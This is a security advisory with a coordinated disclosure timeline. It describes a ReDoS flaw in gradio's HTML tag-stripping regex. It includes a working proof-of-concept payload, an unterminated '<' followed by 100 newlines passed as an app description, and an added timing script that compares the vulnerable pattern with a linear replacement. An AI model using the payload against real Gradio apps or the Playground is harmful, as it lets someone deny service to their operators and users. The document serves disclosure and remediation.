Coordinated Disclosure Timeline
- 2024-10-07: Reported via GitHub Private Vulnerability Reporting (PVR): https://github.com/gradio-app/gradio/security/advisories/GHSA-43j2-q53f-mp9m
- 2025-01-09: Asked for an update.
- 2025-01-15: No response on https://github.com/gradio-app/gradio/security/advisories/GHSA-43j2-q53f-mp9m, so I posted a public PR with the fix: https://github.com/gradio-app/gradio/pull/10368
Summary
The HTML_TAG_RE regex used by remove_html_tags is vulnerable to ReDoS (regular expression denial of service): a short, crafted input makes the match take exponential time.
Project
gradio
Tested Version
Details
ReDoS in remove_html_tags (GHSL-2024-273)
The HTML_TAG_RE regex, which is used by remove_html_tags, contains a ReDoS vulnerability:
import re
HTML_TAG_RE = re.compile("<[^>]*?(?:\n[^>]*?)*>", re.DOTALL)
The lazy class repeat [^>]*? and the repeated group (?:\n[^>]*?)* can both consume newline characters, so the two quantifiers overlap. On an input that starts with < and is followed by many newlines but never reaches a closing >, the engine fails at the end and then backtracks through every way of splitting the newlines between the two quantifiers, which is exponential in the number of newlines.
Proof of concept:
If you start Gradio like this, the process gets stuck in exponential regex backtracking while processing the description and never finishes launching:
import gradio as gr

def greet(name, intensity):
    return "Hello " * intensity + name + "!"

demo = gr.Interface(
    fn=greet,
    inputs=["text", "slider"],
    outputs=["text"],
    # An unterminated "<" followed by 100 newlines: HTML_TAG_RE never finds
    # a closing ">" and backtracks for roughly 2**100 attempts.
    description="<" + "\n" * 100,
)
demo.launch()
Because the Gradio Playground executes user-supplied app code, it is possible that a description crafted like the one above could be used to cause a DoS there as well.
This vulnerability was discovered with the help of CodeQL’s Inefficient regular expression query.
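The following script is an added example, not code from the advisory or from the gradio project. It reproduces the exponential behaviour with a small, measurable number of newlines and sets the original pattern beside a linear-time replacement. The replacement regex `<[^>]*>` is this example's own assumption of a safe equivalent (it is not necessarily the exact change merged in the fix PR): `[^>]` already matches newlines, since `re.DOTALL` only affects `.`, so the `(?:\n[^>]*?)*` group is redundant and dropping it leaves one quantifier that accepts the same strings. `strip_tags` is a stand-in for `remove_html_tags`, and the sample inputs are constructed for the example.

```python
import re
import time

# The regex quoted in the advisory (gradio's HTML_TAG_RE at the time of the report).
# "[^>]*?" and "(?:\n[^>]*?)*" can both consume newlines, so a "<" followed by many
# newlines and no closing ">" forces the engine to try every way of splitting the
# newlines between the two quantifiers before giving up.
VULNERABLE_RE = re.compile("<[^>]*?(?:\n[^>]*?)*>", re.DOTALL)

# Assumed hardened form (this example's choice, not necessarily gradio's merged fix):
# "[^>]" matches newlines regardless of DOTALL, so the newline group adds nothing and
# a single "[^>]*" accepts exactly the same strings in linear time.
SAFE_RE = re.compile("<[^>]*>", re.DOTALL)


def strip_tags(tag_re, text):
    """Remove every <...> span with the given regex.

    Stand-in for gradio's remove_html_tags; the real function may differ in details.
    """
    return tag_re.sub("", text)


def poc_description(n):
    """The advisory's trigger shape: an unterminated tag followed by n newlines."""
    return "<" + "\n" * n


def time_strip(tag_re, text):
    """Seconds spent in one strip_tags call."""
    start = time.perf_counter()
    strip_tags(tag_re, text)
    return time.perf_counter() - start


def same_result(text):
    """True when both regexes strip the text identically (the fix must not change output)."""
    return strip_tags(VULNERABLE_RE, text) == strip_tags(SAFE_RE, text)


# Constructed sample inputs, including tags whose attributes span lines.
BENIGN_SAMPLES = [
    "Hello <b>world</b>!",
    '<p\nclass="x">multi\nline</p> tail',
    "no tags here",
    "<>empty<> and <<nested>>",
    "unterminated < but short",
]

if __name__ == "__main__":
    # Each extra pair of newlines roughly quadruples the time for the original regex.
    for n in (8, 10, 12, 14, 16, 18):
        print(f"vulnerable regex, n={n:2d}: {time_strip(VULNERABLE_RE, poc_description(n)):.4f}s")
    # The linear pattern handles the advisory's n=100 payload instantly.
    print(f"safe regex,      n=100: {time_strip(SAFE_RE, poc_description(100)):.6f}s")
    print("outputs agree on benign samples:", all(same_result(s) for s in BENIGN_SAMPLES))
```

Keep the loop bounded (n=18 is already a few hundred thousand backtracking paths); running the original regex on the advisory's 100-newline payload will not return in any practical time. The equality check over `BENIGN_SAMPLES` is the part worth keeping in a test suite: a regex rewrite that fixes ReDoS but changes which spans are stripped is a different bug.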
Impact
This issue may lead to denial of service.
Credit
This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-273 in any communication regarding this issue.